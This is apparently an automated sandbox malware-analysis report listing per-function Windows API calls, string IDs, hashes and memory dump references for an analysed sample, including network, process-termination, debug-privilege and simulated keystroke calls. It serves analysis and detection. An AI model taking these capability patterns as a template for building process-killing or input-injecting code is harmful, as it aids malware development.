                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: HandleLoadMessageModuleString_wcslen
                                                                                                                                                                                                              • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                                                                              • API String ID: 858772685-4153970271
                                                                                                                                                                                                              • Opcode ID: 1495f2b3661a41cc49afee90f7fc8d2e1ec865b4bc65e6aebc5e84a244aae2e7
                                                                                                                                                                                                              • Instruction ID: 2ceb228bcffac43fc1cf9cd63f444f3e4177c41c42e3d3e84a18b9fadf2a8ef9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1495f2b3661a41cc49afee90f7fc8d2e1ec865b4bc65e6aebc5e84a244aae2e7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0A214F7280421EEBCF12EF90CC06EEE7B39BF18700F04446AF515A51A2EB759658FB12
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetParent.USER32 ref: 00F729F8
                                                                                                                                                                                                              • GetClassNameW.USER32(00000000,?,00000100), ref: 00F72A0D
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00F72A9A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ClassMessageNameParentSend
                                                                                                                                                                                                              • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                                                                              • API String ID: 1290815626-3381328864
                                                                                                                                                                                                              • Opcode ID: 417f35f16598fd0369e83540a4c7bd925c80e7343eddd981a93abf92381423ac
                                                                                                                                                                                                              • Instruction ID: 7c95089c6a828d283d6930fc37403d935e5dc99e3213824b01e1abfb59862842
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 417f35f16598fd0369e83540a4c7bd925c80e7343eddd981a93abf92381423ac
                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC11E977644307B9FA246720DC07DAA379DDF55B34F204013F509E51D1FB69B8417516
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00F1758D
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00F175CE
                                                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 00F175F6
                                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 00F1773A
                                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00F1775B
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Rect$Client$Window$Screen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1296646539-0
                                                                                                                                                                                                              • Opcode ID: 27a4e401b156a42e0f5776af9b25a4dd81d40c9d98bbfaa006440da117600785
                                                                                                                                                                                                              • Instruction ID: e6292debfe64454231d6d2cb5cb5a520fcf04f0c822c3ec003dc64778ffd38f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27a4e401b156a42e0f5776af9b25a4dd81d40c9d98bbfaa006440da117600785
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7FC15B7990475ADBDB10DFA8C540BEDB7B1FF18310F14841AE8A9E3250DB34A985EB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _free$EnvironmentVariable___from_strstr_to_strchr
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1282221369-0
                                                                                                                                                                                                              • Opcode ID: b9b54c10fe40b3d9fbed2c82841d483f190c61b625af51a4598463e42e8a3804
                                                                                                                                                                                                              • Instruction ID: dae2ddfa63faea88424f4f8a10524f62a0dd60fd648039964ca9537f06944fad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b9b54c10fe40b3d9fbed2c82841d483f190c61b625af51a4598463e42e8a3804
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C610471E05304AFDB26AF75DC816AE7FA4AF02330F04017DFD44AB285E6759940B791
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00FA5C24
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000000), ref: 00FA5C65
                                                                                                                                                                                                              • ShowWindow.USER32(?,00000005,?,00000000), ref: 00FA5C6B
                                                                                                                                                                                                              • SetFocus.USER32(?,?,00000005,?,00000000), ref: 00FA5C6F
                                                                                                                                                                                                                • Part of subcall function 00FA79F2: DeleteObject.GDI32(00000000), ref: 00FA7A1E
                                                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00FA5CAB
                                                                                                                                                                                                              • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00FA5CB8
                                                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00FA5CEB
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00FA5D25
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00FA5D34
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 3210457359-0
                                                                                                                                                                                                              • Opcode ID: 0b716191cb361848abad38629514f4c2fb8b1554890a7988fa2a8b56c995248b
                                                                                                                                                                                                              • Instruction ID: c375c580fa7166568161770df92bf8c81c2cb1660995011bf03e78452ab87ba0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0b716191cb361848abad38629514f4c2fb8b1554890a7988fa2a8b56c995248b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: C551BEB1A40A09BFEF249F24CC49FD83B65BB06B71F144111FA259A1E1C775E984FB60
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00F528D1
                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 00F528EA
                                                                                                                                                                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00F528FA
                                                                                                                                                                                                              • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 00F52912
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00F52933
                                                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F52942
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00F5295F
                                                                                                                                                                                                              • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00F111F5,00000000,00000000,00000000,000000FF,00000000), ref: 00F5296E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1268354404-0
                                                                                                                                                                                                              • Opcode ID: 06318dac3c15b3043e3420301eee69741c920c85407f600d415cb80f180d37fc
                                                                                                                                                                                                              • Instruction ID: fca02e4d7d3f387e20f04fd6bde1ab8bbf6cc8a81a96e9c85954bdcbe2ef5955
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 06318dac3c15b3043e3420301eee69741c920c85407f600d415cb80f180d37fc
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B51AB71A00209AFDB24CF24CC85FAA7BB5FF4A761F104619FA52976A0D770E990FB50
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F8CBC7
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F8CBDA
                                                                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 00F8CBEE
                                                                                                                                                                                                                • Part of subcall function 00F8CC98: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F8CCB7
                                                                                                                                                                                                                • Part of subcall function 00F8CC98: GetLastError.KERNEL32 ref: 00F8CD67
                                                                                                                                                                                                                • Part of subcall function 00F8CC98: SetEvent.KERNEL32(?), ref: 00F8CD7B
                                                                                                                                                                                                                • Part of subcall function 00F8CC98: InternetCloseHandle.WININET(00000000), ref: 00F8CD86
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 337547030-0
                                                                                                                                                                                                              • Opcode ID: 327dade78972a4649277659c9ad4317b9815dac0c94c47a89d71112bb4df8b91
                                                                                                                                                                                                              • Instruction ID: 2e309f42bdbcb958ead35f47f32959cf707c25a38fbee828b35b7f5c44602216
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 327dade78972a4649277659c9ad4317b9815dac0c94c47a89d71112bb4df8b91
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF316DB1600745AFDB21AF71CD44AA6BBF8FF46314B04451DF85A82A10C731D814FBA0
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F74393: GetWindowThreadProcessId.USER32(?,00000000), ref: 00F743AD
                                                                                                                                                                                                                • Part of subcall function 00F74393: GetCurrentThreadId.KERNEL32 ref: 00F743B4
                                                                                                                                                                                                                • Part of subcall function 00F74393: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,00F72F00), ref: 00F743BB
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F72F0A
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00F72F28
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 00F72F2C
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F72F36
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00F72F4E
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00F72F52
                                                                                                                                                                                                              • MapVirtualKeyW.USER32(00000025,00000000), ref: 00F72F5C
                                                                                                                                                                                                              • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00F72F70
                                                                                                                                                                                                              • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00F72F74
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 2014098862-0
                                                                                                                                                                                                              • Opcode ID: f3de2a7055da163301e4724e06a42b1c0d7ccc673ddaee13b2393779ed4f06a0
                                                                                                                                                                                                              • Instruction ID: f03e41a22526070c39a883437ce581a1bea8531895e7b062599001099d918384
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f3de2a7055da163301e4724e06a42b1c0d7ccc673ddaee13b2393779ed4f06a0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9801D8717842147BFB1067689C8AF593F6ADB4EB15F100012F31DAE1E0C9E56445AEAA
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00F71D95,?,?,00000000), ref: 00F72159
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000,?,00F71D95,?,?,00000000), ref: 00F72160
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F71D95,?,?,00000000), ref: 00F72175
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,00F71D95,?,?,00000000), ref: 00F7217D
                                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00F71D95,?,?,00000000), ref: 00F72180
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00F71D95,?,?,00000000), ref: 00F72190
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00F71D95,00000000,?,00F71D95,?,?,00000000), ref: 00F72198
                                                                                                                                                                                                              • DuplicateHandle.KERNEL32(00000000,?,00F71D95,?,?,00000000), ref: 00F7219B
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,00F721C1,00000000,00000000,00000000), ref: 00F721B5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1957940570-0
                                                                                                                                                                                                              • Opcode ID: fc81f8cb3a5d46380c46699f68fb914a38ddd572cf079c032a7e9a71dfd6aae7
                                                                                                                                                                                                              • Instruction ID: 126d935564ae66d110f70ddf2e5abc5cf272bd01a28ce115125acf2ce02a2151
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc81f8cb3a5d46380c46699f68fb914a38ddd572cf079c032a7e9a71dfd6aae7
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4301BBB5240308BFEB10AFA5DC4DF6B7BACEB89711F418411FA05DB5A1DA709800DB21
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00F7DD87: CreateToolhelp32Snapshot.KERNEL32 ref: 00F7DDAC
                                                                                                                                                                                                                • Part of subcall function 00F7DD87: Process32FirstW.KERNEL32(00000000,?), ref: 00F7DDBA
                                                                                                                                                                                                                • Part of subcall function 00F7DD87: CloseHandle.KERNEL32(00000000), ref: 00F7DE87
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F9ABCA
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00F9ABDD
                                                                                                                                                                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00F9AC10
                                                                                                                                                                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00F9ACC5
                                                                                                                                                                                                              • GetLastError.KERNEL32(00000000), ref: 00F9ACD0
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00F9AD21
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                                                                                                                                                              • String ID: SeDebugPrivilege
                                                                                                                                                                                                              • API String ID: 2533919879-2896544425
                                                                                                                                                                                                              • Opcode ID: c04cff142850f42a26b864d036721ece7da9b01a8081f94738b203239a1d4bef
                                                                                                                                                                                                              • Instruction ID: 2d536bf9ee124448c37b7da2ee6571c35c197eedc06c6f83a55f7faf4a3950c8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c04cff142850f42a26b864d036721ece7da9b01a8081f94738b203239a1d4bef
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 67619E706082419FEB10DF14C894F25BBE1AF84318F54849CE86A4FBA2C775EC85DBD2
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00FA43C1
                                                                                                                                                                                                              • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 00FA43D6
                                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00FA43F0
                                                                                                                                                                                                              • _wcslen.LIBCMT ref: 00FA4435
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00FA4462
                                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00FA4490
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: MessageSend$Window_wcslen
                                                                                                                                                                                                              • String ID: SysListView32
                                                                                                                                                                                                              • API String ID: 2147712094-78025650
                                                                                                                                                                                                              • Opcode ID: bcdb94ae49abf85b48fecaaccdf22a4e9631029c48a7bf207d5b0580bc33e0ff
                                                                                                                                                                                                              • Instruction ID: a0d37a0ed80108d451c19354c95bf88357595dcae35a2502b12e90d93428e8ad
                                                                                                                                                                                                              • Opcode Fuzzy Hash: bcdb94ae49abf85b48fecaaccdf22a4e9631029c48a7bf207d5b0580bc33e0ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5541C3B1D00309ABDF21DF64CC45BEA7BA9FF49360F100126F954E7291D7B4A980EB90
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00F7C6C4
                                                                                                                                                                                                              • IsMenu.USER32(00000000), ref: 00F7C6E4
                                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 00F7C71A
                                                                                                                                                                                                              • GetMenuItemCount.USER32(01764908), ref: 00F7C76B
                                                                                                                                                                                                              • InsertMenuItemW.USER32(01764908,?,00000001,00000030), ref: 00F7C793
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FD3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764950659.0000000000FDD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764968921.0000000000FE5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_13_2_f10000_Hugo.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Menu$Item$CountCreateInfoInsertPopup
                                                                                                                                                                                                              • String ID: 0$2
                                                                                                                                                                                                              • API String ID: 93392585-3793063076
                                                                                                                                                                                                              • Opcode ID: 9d97857dfdca74a4c15895c5d9072f7b36f47f43f5800e75ddf0d439abf4057e
                                                                                                                                                                                                              • Instruction ID: fa8f42bcdbbf2938d570ff032d341770595d3ae4f5c0f80444a9ace2b631da23
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9d97857dfdca74a4c15895c5d9072f7b36f47f43f5800e75ddf0d439abf4057e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9F519070A002059BDF18CF68D884BAEBBF5AF45324F24C11FE91997291DB709942EF92
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • LoadIconW.USER32(00000000,00007F03), ref: 00F7D1BE
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 0000000D.00000002.2764845634.0000000000F11000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F10000, based on PE: true
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764829542.0000000000F10000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                              • Associated: 0000000D.00000002.2764895264.0000000000FAD000.00000002.00000001.01000000.00000007.sdmpDownload File
